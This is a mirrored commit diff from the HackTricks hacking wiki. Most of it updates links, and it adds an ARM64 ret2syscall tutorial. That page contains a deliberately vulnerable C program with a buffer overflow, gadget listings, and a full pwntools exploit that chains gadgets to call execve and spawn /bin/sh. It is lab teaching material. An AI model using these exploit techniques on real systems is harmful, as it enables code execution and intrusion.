Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

GITBOOK-4309: No subject

Browse source
This commit is contained in:
CPol 2024-04-12 01:30:25 +00:00 committed by gitbook-bot
parent 48412afba2
commit 692c36162c
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
8 changed files with 166 additions and 14 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
SUMMARY.md
View file

@ -706,7 +706,8 @@
* [Leaking libc - template](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md)
* [One Gadget](binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md)
* [Ret2lib + Printf leak - arm64](binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md)
* [Ret2syscall](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv.md)
* [Ret2syscall](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md)
* [Ret2syscall - ARM64](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md)
* [Ret2vDSO](binary-exploitation/rop-return-oriented-programing/ret2vdso.md)
* [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming.md)
* [Array Indexing](binary-exploitation/array-indexing.md)

2
binary-exploitation/basic-binary-exploitation-methodology/README.md
View file

@ -89,7 +89,7 @@ Something to take into account is that usually **just one exploitation of a vuln
#### Via syscalls
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv.md): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**.
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**.
* If [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries.
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming.md) can be useful to prepare the **ret2execve**
* Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers

2
binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md
View file

@ -22,7 +22,7 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter
* It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/) **to bypass** this protection by executing chunks of executable code already present in the binary.
* [**Ret2libc**](../rop-return-oriented-programing/ret2lib/)
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv.md)
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/)
* **Ret2...**
<details>

4
binary-exploitation/rop-return-oriented-programing/README.md
View file

@ -189,8 +189,8 @@ Notice that ROP is just a technique in order to execute arbitrary code. Based in
* **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands.
{% content-ref url="rop-syscall-execv.md" %}
[rop-syscall-execv.md](rop-syscall-execv.md)
{% content-ref url="rop-syscall-execv/" %}
[rop-syscall-execv](rop-syscall-execv/)
{% endcontent-ref %}
* **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP).

2
binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
View file

@ -25,7 +25,7 @@ Therefore, it's possible to **fake all these structures** to make the dynamic li
Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** , having it **resolve the address of `system`** in the fake structures and **calling this address** with the address to `$'/bin/sh'`.
{% hint style="success" %}
This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv.md) or [SROP](srop-sigreturn-oriented-programming.md)) and there are't ways to leak libc addresses.
This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/) or [SROP](srop-sigreturn-oriented-programming.md)) and there are't ways to leak libc addresses.
{% endhint %}
You can find a better explanation about this technique in the second half of the video:

6
binary-exploitation/rop-return-oriented-programing/rop-syscall-execv.md → binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md
View file

@ -28,7 +28,7 @@ In order to prepare the call for the **syscall** it's needed the following confi
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
{% hint style="success" %}
Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../stack-overflow/stack-shellcode/).
Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../../stack-overflow/stack-shellcode/).
{% endhint %}
## Register gadgets
@ -123,8 +123,8 @@ rop += writeGadget #Address to: mov qword ptr [rax], rdx
If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack:
{% content-ref url="srop-sigreturn-oriented-programming.md" %}
[srop-sigreturn-oriented-programming.md](srop-sigreturn-oriented-programming.md)
{% content-ref url="../srop-sigreturn-oriented-programming.md" %}
[srop-sigreturn-oriented-programming.md](../srop-sigreturn-oriented-programming.md)
{% endcontent-ref %}
## Exploit Example

151
binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md Normal file
View file

@ -0,0 +1,151 @@
# Ret2syscall - ARM64
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
Find an introduction to arm64 in:
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
{% endcontent-ref %}
## Code
We are going to use the example from the page:
{% content-ref url="../../stack-overflow/ret2win/ret2win-arm64.md" %}
[ret2win-arm64.md](../../stack-overflow/ret2win/ret2win-arm64.md)
{% endcontent-ref %}
```c
#include <stdio.h>
#include <unistd.h>
void win() {
printf("Congratulations!\n");
}
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}
int main() {
vulnerable_function();
return 0;
}
```
Compile without pie and canary:
```bash
clang -o ret2win ret2win.c -fno-stack-protector
```
## Gadgets
In order to prepare the call for the **syscall** it's needed the following configuration:
* `x8: 221 Specify sys_execve`
* `x0: ptr to "/bin/sh" specify file to execute`
* `x1: 0 specify no arguments passed`
* `x2: 0 specify no environment variables passed`
Using ROPgadget.py I was able to locate the following gadgets:
{% code overflow="wrap" %}
```armasm
;Load x0, x1 and x3 from stack and x5 and call x5
0x0000000000114c30:
ldp x3, x0, [sp, #8] ;
ldp x1, x4, [sp, #0x18] ;
ldr x5, [sp, #0x58] ;
ldr x2, [sp, #0xe0] ;
blr x5
;Move execve syscall (0xdd) to x8 and call it
0x00000000000bb97c :
nop ;
nop ;
mov x8, #0xdd ;
svc #0
```
{% endcode %}
With the previous gadgets we can control all the needed registers from the stack and use x5 to jump to the second gadget to call the syscall.
### Exploit
```python
from pwn import *
p = process('./ret2syscall')
elf = context.binary = ELF('./ret2syscall')
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
libc.address = 0x0000fffff7df0000 # ASLR disabled
binsh = next(libc.search(b"/bin/sh"))
stack_offset = 72
#0x0000000000114c2c : bl #0x133070 ; ldp x3, x0, [sp, #8] ; ldp x1, x4, [sp, #0x18] ; ldr x5, [sp, #0x58] ; ldr x2, [sp, #0xe0] ; blr x5
load_x0_x1_x2 = libc.address + 0x114c30 # ldp x3, x0, [sp, #8] ; ldp x1, x4, [sp, #0x18] ; ldr x5, [sp, #0x58] ; ldr x2, [sp, #0xe0] ; blr x5
# 0x00000000000bb97c : nop ; nop ; mov x8, #0xdd ; svc #0
call_execve = libc.address + 0xbb97c
print("/bin/sh in: " + hex(binsh))
print("load_x0_x1_x2 in: " + hex(load_x0_x1_x2))
print("call_execve in: " + hex(call_execve))
# stack offset
bof = b"A" * (stack_offset)
bof += p64(load_x0_x1_x2)
# ldp x3, x0, [sp, #8]
rop = b"BBBBBBBBBBBBBBBB" #x3
rop += p64(binsh) #x0
# ldp x1, x4, [sp, #0x18]
rop += b"C"*(0x18 - len(rop))
rop += p64(0x00) # x1
rop += b"CCCCCCCC" #x4
# ldr x5, [sp, #0x58]
rop += b"D"*(0x58 - len(rop))
rop += p64(call_execve) # x5
# ldr x2, [sp, #0xe0]
rop += b"E" * (0xe0 - len(rop))
rop += p64(0x00) # x2
payload = bof + rop
p.sendline(payload)
p.interactive()
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

10
binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming.md
View file

@ -28,8 +28,8 @@ Calling the syscall **`sigreturn`** from a ROP chain and **adding the registry v
Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls:
{% content-ref url="rop-syscall-execv.md" %}
[rop-syscall-execv.md](rop-syscall-execv.md)
{% content-ref url="rop-syscall-execv/" %}
[rop-syscall-execv](rop-syscall-execv/)
{% endcontent-ref %}
If you are curious this is the **sigcontext structure** stored in the stack to later recover the values (diagram from [**here**](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)):
@ -145,11 +145,11 @@ target.interactive()
* [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared)
* [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
* [https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv.md) via a **sigreturn** structure and read the flag which is inside the memory of the binary.
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv/) via a **sigreturn** structure and read the flag which is inside the memory of the binary.
* [https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html)
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv.md) via a **sigreturn** structure (the binary has the string `/bin/sh`).
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv/) via a **sigreturn** structure (the binary has the string `/bin/sh`).
* [https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html)
* 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](rop-syscall-execv.md). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell.
* 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](rop-syscall-execv/). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell.
* [https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html)
* 64 bits assembly program, no relro, no canary, nx, no pie. The flow allows to write in the stack, control several registers, and call a syscall and then it calls `exit`. The selected syscall is a `sigreturn` that will set registries and move `eip` to call a previous syscall instruction and run `memprotect` to set the binary space to `rwx` and set the ESP in the binary space. Following the flow, the program will call read intro ESP again, but in this case ESP will be pointing to the next intruction so passing a shellcode will write it as the next instruction and execute it.